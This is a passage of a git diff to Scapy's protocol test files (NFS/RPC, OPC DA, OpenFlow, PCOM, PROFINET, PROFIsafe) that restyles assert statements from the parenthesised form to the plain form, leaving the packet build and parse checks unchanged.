RPC()/RPC_Call()/READ_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 6)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 6) pkt = RPC()/RPC_Call()/WRITE_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 7)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 7) pkt = RPC()/RPC_Call()/CREATE_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 8)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 8) pkt = RPC()/RPC_Call()/MKDIR_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 9)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 9) pkt = RPC()/RPC_Call()/SYMLINK_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 10)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 10) pkt = RPC()/RPC_Call()/REMOVE_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 12)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 12) pkt = RPC()/RPC_Call()/RMDIR_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 13)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 13) pkt = RPC()/RPC_Call()/RENAME_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 14)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 14) pkt = RPC()/RPC_Call()/LINK_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 15)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 15) pkt = RPC()/RPC_Call()/READDIR_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 16)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 16) pkt = RPC()/RPC_Call()/READDIRPLUS_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 17)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 17) pkt = RPC()/RPC_Call()/FSSTAT_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 18)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 18) pkt = RPC()/RPC_Call()/FSINFO_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 19)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 19) pkt = RPC()/RPC_Call()/PATHCONF_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 20)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 20) pkt = RPC()/RPC_Call()/COMMIT_Call() -assert((pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 21)) +assert (pkt.mtype, pkt.program, pkt.pversion, pkt.procedure) == (0, 100003, 3, 21) = Layer Bindings for NFS Replies from scapy.contrib.oncrpc import * pkt = RPC()/RPC_Reply()/NULL_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/GETATTR_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/SETATTR_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/LOOKUP_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/ACCESS_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/READLINK_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/READ_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/WRITE_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/CREATE_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/MKDIR_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/SYMLINK_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/REMOVE_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/RMDIR_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/RENAME_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/LINK_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/READDIR_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/READDIRPLUS_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/FSSTAT_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/FSINFO_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/PATHCONF_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 pkt = RPC()/RPC_Reply()/COMMIT_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 + Test Built Packets Against Raw Strings diff --git a/test/contrib/oncrpc.uts b/test/contrib/oncrpc.uts index 32917a76e9c..aabe0c1a89b 100644 --- a/test/contrib/oncrpc.uts +++ b/test/contrib/oncrpc.uts @@ -19,9 +19,9 @@ RPC_Reply() = RPC Message type pkt = RPC()/RPC_Call() -assert(pkt.mtype==0) +assert pkt.mtype==0 pkt = RPC()/RPC_Reply() -assert(pkt.mtype==1) +assert pkt.mtype==1 + Test Built Packets vs Raw Strings diff --git a/test/contrib/opc_da.uts b/test/contrib/opc_da.uts index 1d3b3ce35e5..c664a6ede74 100644 --- a/test/contrib/opc_da.uts +++ b/test/contrib/opc_da.uts @@ -15,7 +15,7 @@ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=0, \ versionMajor=0,versionMinor=0,stubdata=''))) elem2 = raw(opcdaRequestPacket_Build) -assert( elem1 == elem2 ) +assert elem1 == elem2 = OpcDaRequestLE opcdaRequestLEPacket_Dissect = hex_bytes(b'050000831000000064000000150000003c000000060005001dc400009c0a0000d7028c761299f7bf000000000000000000000000512d4e34ab431449a2cf7784b21b3ea1') @@ -32,7 +32,7 @@ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=0, \ stubdata=b'\x00\x00\x00\x00\x00\x00\x00\x00Q-N4\xabC\x14I\xa2\xcfw\x84\xb2\x1b>\xa1'))) elem2 = raw(opcdaRequestLEPacket_Build) -assert( elem1 == elem2 ) +assert elem1 == elem2 + Test Ping Packet @@ -48,7 +48,7 @@ opcdaPingPacket_Build = OpcDaMessage(OpcDaMessage= \ / OpcDaPing()) / '\x00' elem2 = raw(opcdaPingPacket_Build) -assert( elem1 == elem2 ) +assert elem1 == elem2 + Test Response Packets @@ -65,7 +65,7 @@ opcDaResponsePacket_Build = OpcDaMessage(OpcDaMessage= \ stubData=b'0'*(212-32))) elem2 = raw(opcDaResponsePacket_Build) -assert( elem1 == elem2 ) +assert elem1 == elem2 = OpcDaResponseLE opcDaResponseLEPacket_Dissect = hex_bytes(b'0500020310000000d400000015000000bc00000006000000303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030') @@ -80,7 +80,7 @@ opcDaResponseLEPacket_Build = OpcDaMessage(OpcDaMessage= \ stubData=b'0'*(212-32))) elem2 = raw(opcDaResponseLEPacket_Build) -assert( elem1 == elem2 ) +assert elem1 == elem2 # + Test Fault Packet # No example yet diff --git a/test/contrib/openflow.uts b/test/contrib/openflow.uts index 6d236344c19..56c50d6f772 100755 --- a/test/contrib/openflow.uts +++ b/test/contrib/openflow.uts @@ -17,7 +17,7 @@ raw(ofm) == b'\x01\x02\x00\x08\x00\x00\x00\x00' = OFPMatch(), check wildcard completion ofm = OFPMatch(in_port=1, nw_tos=8) ofm = OFPMatch(raw(ofm)) -assert(ofm.wildcards1 == 0x1) +assert ofm.wildcards1 == 0x1 ofm.wildcards2 == 0xee = OpenFlow(), generic method test with OFPTEchoRequest() @@ -27,9 +27,9 @@ isinstance(OpenFlow(s), OFPTEchoRequest) = OFPTFlowMod(), check codes and defaults values ofm = OFPTFlowMod(cmd='OFPFC_DELETE', out_port='CONTROLLER', flags='CHECK_OVERLAP+EMERG') -assert(ofm.cmd == 3) -assert(ofm.buffer_id == 0xffffffff) -assert(ofm.out_port == 0xfffd) +assert ofm.cmd == 3 +assert ofm.buffer_id == 0xffffffff +assert ofm.out_port == 0xfffd ofm.flags == 6 + Complex OFv1.0 messages @@ -55,8 +55,8 @@ raw(ofm) == s ofm = OFPTPacketIn(data=Ether()/IP()/ICMP()) p = OFPTPacketIn(raw(ofm)) dat = p.data -assert(isinstance(dat, Ether)) -assert(isinstance(dat.payload, IP)) +assert isinstance(dat, Ether) +assert isinstance(dat.payload, IP) isinstance(dat.payload.payload, ICMP) = OFPTStatsReplyFlow() @@ -93,7 +93,7 @@ isinstance(p[TCP].payload, OFPTHello) = complete Ether()/IP()/TCP()/OFPTFeaturesRequest() ofm = Ether(src='00:11:22:33:44:55',dst='01:23:45:67:89:ab')/IP(src='10.0.0.7',dst='192.168.0.42')/TCP(sport=6633, dport=6633)/OFPTFeaturesRequest(xid=23) s = b'\x01#Eg\x89\xab\x00\x11"3DU\x08\x00E\x00\x000\x00\x01\x00\x00@\x06\xaf\xee\n\x00\x00\x07\xc0\xa8\x00*\x19\xe9\x19\xe9\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x90\x0b\x00\x00\x01\x05\x00\x08\x00\x00\x00\x17' -assert(raw(ofm) == s) +assert raw(ofm) == s e = Ether(s) e.show2() e[OFPTFeaturesRequest].xid == 23 diff --git a/test/contrib/openflow3.uts b/test/contrib/openflow3.uts index ce18b3dbf39..b2b88e655ef 100755 --- a/test/contrib/openflow3.uts +++ b/test/contrib/openflow3.uts @@ -16,7 +16,7 @@ raw(ofm) == b'\x04\x02\x00\x08\x00\x00\x00\x00' = OFPMatch(), check padding ofm = OFPMatch(oxm_fields=OFBEthType(eth_type=0x86dd)) -assert(len(raw(ofm))%8 == 0) +assert len(raw(ofm))%8 == 0 raw(ofm) == b'\x00\x01\x00\x0a\x80\x00\x0a\x02\x86\xdd\x00\x00\x00\x00\x00\x00' = OpenFlow3(), generic method test with OFPTEchoRequest() @@ -26,13 +26,13 @@ isinstance(OpenFlow3(s), OFPTEchoRequest) = OFPTFlowMod(), check codes and defaults values ofm = OFPTFlowMod(cmd='OFPFC_DELETE', out_group='ALL', flags='CHECK_OVERLAP+NO_PKT_COUNTS') -assert(ofm.cmd == 3) -assert(ofm.out_port == 0xffffffff) -assert(ofm.out_group == 0xfffffffc) +assert ofm.cmd == 3 +assert ofm.out_port == 0xffffffff +assert ofm.out_group == 0xfffffffc ofm.flags == 10 = OFBIPv6ExtHdrHMID(), check creation of last OXM classes -assert(hasattr(OFBIPv6ExtHdr(), 'ipv6_ext_hdr_flags')) +assert hasattr(OFBIPv6ExtHdr(), 'ipv6_ext_hdr_flags') OFBIPv6ExtHdrHMID().field == 39 + Complex OFv1.3 messages @@ -78,8 +78,8 @@ assert fpti.instruction_ids[1].type == 5 ofm = OFPTPacketIn(data=Ether()/IP()/ICMP()) p = OFPTPacketIn(raw(ofm)) dat = p.data -assert(isinstance(dat, Ether)) -assert(isinstance(dat.payload, IP)) +assert isinstance(dat, Ether) +assert isinstance(dat.payload, IP) isinstance(dat.payload.payload, ICMP) = OFPTGroupMod() @@ -153,7 +153,7 @@ assert pkt[OFPTHello].elements[0].len == 8 = complete Ether()/IP()/TCP()/OFPTFeaturesRequest() ofm = Ether(src='00:11:22:33:44:55',dst='01:23:45:67:89:ab')/IP(src='10.0.0.7',dst='192.168.0.42')/TCP(sport=6633)/OFPTFeaturesRequest(xid=23) s = b'\x01#Eg\x89\xab\x00\x11"3DU\x08\x00E\x00\x000\x00\x01\x00\x00@\x06\xaf\xee\n\x00\x00\x07\xc0\xa8\x00*\x19\xe9\x19\xfd\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8c\xf7\x00\x00\x04\x05\x00\x08\x00\x00\x00\x17' -assert(raw(ofm) == s) +assert raw(ofm) == s e = Ether(s) e.show2() e[OFPTFeaturesRequest].xid == 23 diff --git a/test/contrib/pcom.uts b/test/contrib/pcom.uts index 39e83eea109..110a4db86cd 100755 --- a/test/contrib/pcom.uts +++ b/test/contrib/pcom.uts @@ -16,14 +16,10 @@ r = b'\x65\x00\x04\x00\x00\x00\x00\x00' raw(PCOMResponse() / b'\x00\x00\x00\x00')[2:] == r = PCOM/TCP Guess Payload Class -assert(isinstance(PCOMRequest(b'\x00\x00\x65\x00\x01\x00\x00\x00').payload, -PCOMAsciiRequest)) -assert(isinstance(PCOMResponse(b'\x00\x00\x65\x00\x01\x00\x00\x00').payload, -PCOMAsciiResponse)) -assert(isinstance(PCOMRequest(b'\x00\x00\x66\x00\x01\x00\x00\x00').payload, -PCOMBinaryRequest)) -assert(isinstance(PCOMResponse(b'\x00\x00\x66\x00\x01\x00\x00\x00').payload, -PCOMBinaryResponse)) +assert isinstance(PCOMRequest(b'\x00\x00\x65\x00\x01\x00\x00\x00').payload, PCOMAsciiRequest) +assert isinstance(PCOMResponse(b'\x00\x00\x65\x00\x01\x00\x00\x00').payload, PCOMAsciiResponse) +assert isinstance(PCOMRequest(b'\x00\x00\x66\x00\x01\x00\x00\x00').payload, PCOMBinaryRequest) +assert isinstance(PCOMResponse(b'\x00\x00\x66\x00\x01\x00\x00\x00').payload, PCOMBinaryResponse) + Test PCOM/Ascii = PCOM/ASCII Default values @@ -40,8 +36,8 @@ raw(PCOMResponse() / PCOMAsciiResponse(unitId='00',command='ID'))[2:] == r = PCOM/ASCII Known Codes f = PCOMAsciiCommandField('command', '', length_from= None) -assert(f.i2repr(None, 'CCS') == 'Send Stop Command \'CCS\'') -assert(f.i2repr(None, 'CC') == 'Reply of Admin Commands (CC*) \'CC\'') +assert f.i2repr(None, 'CCS') == 'Send Stop Command \'CCS\'' +assert f.i2repr(None, 'CC') == 'Reply of Admin Commands (CC*) \'CC\'' + Test PCOM/Binary = PCOM/Binary Default values @@ -65,4 +61,4 @@ commandSpecific='\x00\x00\x00\x00\x00\x01', len=4, data= data))[2:] == r = PCOM/Binary Known Codes f = PCOMBinaryCommandField('command', None) -assert(f.i2repr(None, 0x4d) == 'Read Operands Request - 0x4d') +assert f.i2repr(None, 0x4d) == 'Read Operands Request - 0x4d' diff --git a/test/contrib/pnio.uts b/test/contrib/pnio.uts index d783374b708..9528e6b0d58 100644 --- a/test/contrib/pnio.uts +++ b/test/contrib/pnio.uts @@ -37,24 +37,24 @@ isinstance(p.payload, ProfinetIO) and p.frameID == 0x0102 = ProfinetIO PNIORealTime_IOxS parsing of a single status p = PNIORealTime_IOxS(b'\x80') -assert(p.dataState == 1) -assert(p.instance == 0) -assert(p.reserved == 0) -assert(p.extension == 0) +assert p.dataState == 1 +assert p.instance == 0 +assert p.reserved == 0 +assert p.extension == 0 p = PNIORealTime_IOxS(b'\xe1') -assert(p.dataState == 1) -assert(p.instance == 3) -assert(p.reserved == 0) -assert(p.extension == 1) +assert p.dataState == 1 +assert p.instance == 3 +assert p.reserved == 0 +assert p.extension == 1 True = ProfinetIO PNIORealTime_IOxS building of a single status p = PNIORealTime_IOxS(dataState = 'good', instance='subslot', extension=0) -assert(raw(p) == b'\x80') +assert raw(p) == b'\x80' p = PNIORealTime_IOxS(dataState = 'bad', instance='device', extension=1) -assert(raw(p) == b'\x41') +assert raw(p) == b'\x41' True = ProfinetIO PNIORealTime_IOxS parsing with multiple statuses @@ -70,38 +70,38 @@ TestPacket = type( ) p = TestPacket(b'\x81\xe1\x01\x80') -assert(len(p.data) == 4) -assert(p.data[0].dataState == 1) -assert(p.data[0].instance == 0) -assert(p.data[0].reserved == 0) -assert(p.data[0].extension == 1) -assert(p.data[1].dataState == 1) -assert(p.data[1].instance == 3) -assert(p.data[1].reserved == 0) -assert(p.data[1].extension == 1) -assert(p.data[2].dataState == 0) -assert(p.data[2].instance == 0) -assert(p.data[2].reserved == 0) -assert(p.data[2].extension == 1) -assert(p.data[3].dataState == 1) -assert(p.data[3].instance == 0) -assert(p.data[3].reserved == 0) -assert(p.data[3].extension == 0) +assert len(p.data) == 4 +assert p.data[0].dataState == 1 +assert p.data[0].instance == 0 +assert p.data[0].reserved == 0 +assert p.data[0].extension == 1 +assert p.data[1].dataState == 1 +assert p.data[1].instance == 3 +assert p.data[1].reserved == 0 +assert p.data[1].extension == 1 +assert p.data[2].dataState == 0 +assert p.data[2].instance == 0 +assert p.data[2].reserved == 0 +assert p.data[2].extension == 1 +assert p.data[3].dataState == 1 +assert p.data[3].instance == 0 +assert p.data[3].reserved == 0 +assert p.data[3].extension == 0 = ProfinetIO RTC PDU parsing without configuration p = Ether(b'\x00\x02\x04\x06\x08\x0a\x01\x03\x05\x07\x09\x0B\x88\x92\x80\x00\x01\x02\x03\x04\xf0\x00\x35\x00') -assert(p[Ether].dst == '00:02:04:06:08:0a') -assert(p[Ether].src == '01:03:05:07:09:0b') -assert(p[Ether].type == 0x8892) -assert(p[ProfinetIO].frameID == 0x8000) -assert(isinstance(p[ProfinetIO].payload, PNIORealTimeCyclicPDU)) -assert(len(p[PNIORealTimeCyclicPDU].data) == 1) -assert(isinstance(p[PNIORealTimeCyclicPDU].data[0], PNIORealTimeCyclicDefaultRawData)) -assert(p[PNIORealTimeCyclicDefaultRawData].data == b'\x01\x02\x03\x04') -assert(p[PNIORealTimeCyclicPDU].padding == b'') -assert(p[PNIORealTimeCyclicPDU].cycleCounter == 0xf000) -assert(p[PNIORealTimeCyclicPDU].dataStatus == 0x35) -assert(p[PNIORealTimeCyclicPDU].transferStatus == 0) +assert p[Ether].dst == '00:02:04:06:08:0a' +assert p[Ether].src == '01:03:05:07:09:0b' +assert p[Ether].type == 0x8892 +assert p[ProfinetIO].frameID == 0x8000 +assert isinstance(p[ProfinetIO].payload, PNIORealTimeCyclicPDU) +assert len(p[PNIORealTimeCyclicPDU].data) == 1 +assert isinstance(p[PNIORealTimeCyclicPDU].data[0], PNIORealTimeCyclicDefaultRawData) +assert p[PNIORealTimeCyclicDefaultRawData].data == b'\x01\x02\x03\x04' +assert p[PNIORealTimeCyclicPDU].padding == b'' +assert p[PNIORealTimeCyclicPDU].cycleCounter == 0xf000 +assert p[PNIORealTimeCyclicPDU].dataStatus == 0x35 +assert p[PNIORealTimeCyclicPDU].transferStatus == 0 True = ProfinetIO RTC PDU building @@ -149,80 +149,80 @@ p = Ether( b'\x00' ) -assert(p[Ether].dst == '00:02:04:06:08:0a') -assert(p[Ether].src == '01:03:05:07:09:0b') -assert(p[Ether].type == 0x8892) -assert(p[ProfinetIO].frameID == 0x8010) -assert(isinstance(p[ProfinetIO].payload, PNIORealTimeCyclicPDU)) -assert(len(p[PNIORealTimeCyclicPDU].data) == 3) -assert(isinstance(p[PNIORealTimeCyclicPDU].data[0], scapy.config.conf.raw_layer)) -assert(p[PNIORealTimeCyclicPDU].data[0].data == b'\x01\x02\x03\x04\x05') -assert(isinstance(p[PNIORealTimeCyclicPDU].data[1], scapy.config.conf.raw_layer)) -assert(p[PNIORealTimeCyclicPDU].data[1].data == b'\x01\x02\x03') -assert(isinstance(p[PNIORealTimeCyclicPDU].data[2], scapy.config.conf.raw_layer)) -assert(p[PNIORealTimeCyclicPDU].data[2].data == b'\x01\x02') -assert(p[PNIORealTimeCyclicPDU].padding == b'\x00' * 2) -assert(p[PNIORealTimeCyclicPDU].cycleCounter == 0xf000) -assert(p[PNIORealTimeCyclicPDU].dataStatus == 0x35) -assert(p[PNIORealTimeCyclicPDU].transferStatus == 0) +assert p[Ether].dst == '00:02:04:06:08:0a' +assert p[Ether].src == '01:03:05:07:09:0b' +assert p[Ether].type == 0x8892 +assert p[ProfinetIO].frameID == 0x8010 +assert isinstance(p[ProfinetIO].payload, PNIORealTimeCyclicPDU) +assert len(p[PNIORealTimeCyclicPDU].data) == 3 +assert isinstance(p[PNIORealTimeCyclicPDU].data[0], scapy.config.conf.raw_layer) +assert p[PNIORealTimeCyclicPDU].data[0].data == b'\x01\x02\x03\x04\x05' +assert isinstance(p[PNIORealTimeCyclicPDU].data[1], scapy.config.conf.raw_layer) +assert p[PNIORealTimeCyclicPDU].data[1].data == b'\x01\x02\x03' +assert isinstance(p[PNIORealTimeCyclicPDU].data[2], scapy.config.conf.raw_layer) +assert p[PNIORealTimeCyclicPDU].data[2].data == b'\x01\x02' +assert p[PNIORealTimeCyclicPDU].padding == b'\x00' * 2 +assert p[PNIORealTimeCyclicPDU].cycleCounter == 0xf000 +assert p[PNIORealTimeCyclicPDU].dataStatus == 0x35 +assert p[PNIORealTimeCyclicPDU].transferStatus == 0 p = Ether(b'\x00\x02\x04\x06\x08\x0a\x01\x03\x05\x07\x09\x0B\x88\x92\x80\x00\x01\x02\x03\x04\xf0\x00\x35\x00') -assert(p[Ether].dst == '00:02:04:06:08:0a') -assert(p[Ether].src == '01:03:05:07:09:0b') -assert(p[Ether].type == 0x8892) -assert(p[ProfinetIO].frameID == 0x8000) -assert(isinstance(p[ProfinetIO].payload, PNIORealTimeCyclicPDU)) -assert(len(p[PNIORealTimeCyclicPDU].data) == 1) -assert(isinstance(p[PNIORealTimeCyclicPDU].data[0], PNIORealTimeCyclicDefaultRawData)) -assert(p[PNIORealTimeCyclicDefaultRawData].data == b'\x01\x02\x03\x04') -assert(p[PNIORealTimeCyclicPDU].padding == b'') -assert(p[PNIORealTimeCyclicPDU].cycleCounter == 0xf000) -assert(p[PNIORealTimeCyclicPDU].dataStatus == 0x35) -assert(p[PNIORealTimeCyclicPDU].transferStatus == 0) +assert p[Ether].dst == '00:02:04:06:08:0a' +assert p[Ether].src == '01:03:05:07:09:0b' +assert p[Ether].type == 0x8892 +assert p[ProfinetIO].frameID == 0x8000 +assert isinstance(p[ProfinetIO].payload, PNIORealTimeCyclicPDU) +assert len(p[PNIORealTimeCyclicPDU].data) == 1 +assert isinstance(p[PNIORealTimeCyclicPDU].data[0], PNIORealTimeCyclicDefaultRawData) +assert p[PNIORealTimeCyclicDefaultRawData].data == b'\x01\x02\x03\x04' +assert p[PNIORealTimeCyclicPDU].padding == b'' +assert p[PNIORealTimeCyclicPDU].cycleCounter == 0xf000 +assert p[PNIORealTimeCyclicPDU].dataStatus == 0x35 +assert p[PNIORealTimeCyclicPDU].transferStatus == 0 True = PROFIsafe parsing (query with F_CRC_SEED=0) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeControl, 2)(b'\x80\x80\x40\x01\x02\x03') -assert(p.data == b'\x80\x80') -assert(p.control == 0x40) -assert(p.crc == 0x010203) +assert p.data == b'\x80\x80' +assert p.control == 0x40 +assert p.crc == 0x010203 True = PROFIsafe parsing (query with F_CRC_SEED=1) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeControlCRCSeed, 2)(b'\x80\x80\x40\x01\x02\x03\x04') -assert(p.data == b'\x80\x80') -assert(p.control == 0x40) -assert(p.crc == 0x01020304) +assert p.data == b'\x80\x80' +assert p.control == 0x40 +assert p.crc == 0x01020304 True = PROFIsafe parsing (response with F_CRC_SEED=0) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeStatus, 1)(b'\x80\x40\x01\x02\x03') -assert(p.data == b'\x80') -assert(p.status == 0x40) -assert(p.crc == 0x010203) +assert p.data == b'\x80' +assert p.status == 0x40 +assert p.crc == 0x010203 True = PROFIsafe parsing (response with F_CRC_SEED=1) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeStatusCRCSeed, 1)(b'\x80\x40\x01\x02\x03\x04') -assert(p.data == b'\x80') -assert(p.status == 0x40) -assert(p.crc == 0x01020304) +assert p.data == b'\x80' +assert p.status == 0x40 +assert p.crc == 0x01020304 True = PROFIsafe building (query with F_CRC_SEED=0) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeControl, 2)(data = b'\x81\x80', control=0x40, crc=0x040506) -assert(raw(p) == b'\x81\x80\x40\x04\x05\x06') +assert raw(p) == b'\x81\x80\x40\x04\x05\x06' = PROFIsafe building (query with F_CRC_SEED=1) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeControlCRCSeed, 2)(data = b'\x81\x80', control=0x02, crc=0x04050607) -assert(raw(p) == b'\x81\x80\x02\x04\x05\x06\x07') +assert raw(p) == b'\x81\x80\x02\x04\x05\x06\x07' = PROFIsafe building (response with F_CRC_SEED=0) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeStatus, 3)(data = b'\x01\x81\x00', status=0x01, crc=0x040506) -assert(raw(p) == b'\x01\x81\x00\x01\x04\x05\x06') +assert raw(p) == b'\x01\x81\x00\x01\x04\x05\x06' = PROFIsafe building (response with F_CRC_SEED=1) p = PROFIsafe.build_PROFIsafe_class(PROFIsafeStatusCRCSeed, 3)(data = b'\x01\x81\x80', status=0x01, crc=0x04050607) -assert(raw(p) == b'\x01\x81\x80\x01\x04\x05\x06\x07') +assert raw(p) == b'\x01\x81\x80\x01\x04\x05\x06\x07' conf.debug_dissector = old_conf_dissector diff --git a/test/contrib/pnio_dcp.uts b/test/contrib/pnio_dcp.uts index 232d5016795..b018db92356 100644 --- a/test/contrib/pnio_dcp.uts +++ b/test/contrib/pnio_dcp.uts @@ -20,18 +20,18 @@ p = Ether(b'\x01\x0e\xcf\x00\x00\x00\x01\x23\x45\x67\x89\xab\x88\x92\xfe\xfe' \ b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \ b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -assert(p[Ether].dst == '01:0e:cf:00:00:00') -assert(p[Ether].src == '01:23:45:67:89:ab') -assert(p[Ether].type == 0x8892) -assert(p[ProfinetIO].frameID == 0xfefe) -assert(p[ProfinetDCP].service_id == 0x05) -assert(p[ProfinetDCP].service_type == 0x00) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x01) -assert(p[ProfinetDCP].dcp_data_length == 0x04) -assert(p[ProfinetDCP].option == 0xff) -assert(p[ProfinetDCP].sub_option == 0xff) -assert(p[ProfinetDCP].dcp_block_length == 0x00) +assert p[Ether].dst == '01:0e:cf:00:00:00' +assert p[Ether].src == '01:23:45:67:89:ab' +assert p[Ether].type == 0x8892 +assert p[ProfinetIO].frameID == 0xfefe +assert p[ProfinetDCP].service_id == 0x05 +assert p[ProfinetDCP].service_type == 0x00 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x01 +assert p[ProfinetDCP].dcp_data_length == 0x04 +assert p[ProfinetDCP].option == 0xff +assert p[ProfinetDCP].sub_option == 0xff +assert p[ProfinetDCP].dcp_block_length == 0x00 = DCP Set Request parsing @@ -41,19 +41,19 @@ p = Ether(b'\x01\x23\x45\x67\x89\xac\x01\x23\x45\x67\x89\xab\x88\x92\xfe\xfd' \ b'\x64\x65\x76\x69\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \ b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -assert(p[Ether].dst == '01:23:45:67:89:ac') -assert(p[Ether].src == '01:23:45:67:89:ab') -assert(p[Ether].type == 0x8892) -assert(p[ProfinetIO].frameID == 0xfefd) -assert(p[ProfinetDCP].service_id == 0x04) -assert(p[ProfinetDCP].service_type == 0x00) -assert(p[ProfinetDCP].xid == 0x0000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 0x0c) -assert(p[ProfinetDCP].option == 0x02) -assert(p[ProfinetDCP].sub_option == 0x02) -assert(p[ProfinetDCP].dcp_block_length == 0x08) -assert(p[ProfinetDCP].block_qualifier == 0x01) +assert p[Ether].dst == '01:23:45:67:89:ac' +assert p[Ether].src == '01:23:45:67:89:ab' +assert p[Ether].type == 0x8892 +assert p[ProfinetIO].frameID == 0xfefd +assert p[ProfinetDCP].service_id == 0x04 +assert p[ProfinetDCP].service_type == 0x00 +assert p[ProfinetDCP].xid == 0x0000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 0x0c +assert p[ProfinetDCP].option == 0x02 +assert p[ProfinetDCP].sub_option == 0x02 +assert p[ProfinetDCP].dcp_block_length == 0x08 +assert p[ProfinetDCP].block_qualifier == 0x01 = DCP Identify Response parsing @@ -67,68 +67,68 @@ p = Ether(b'\x94\x65\x9c\x51\x90\x7d\xac\x64\x17\x21\x35\xcf\x81\x00\x00\x00' \ 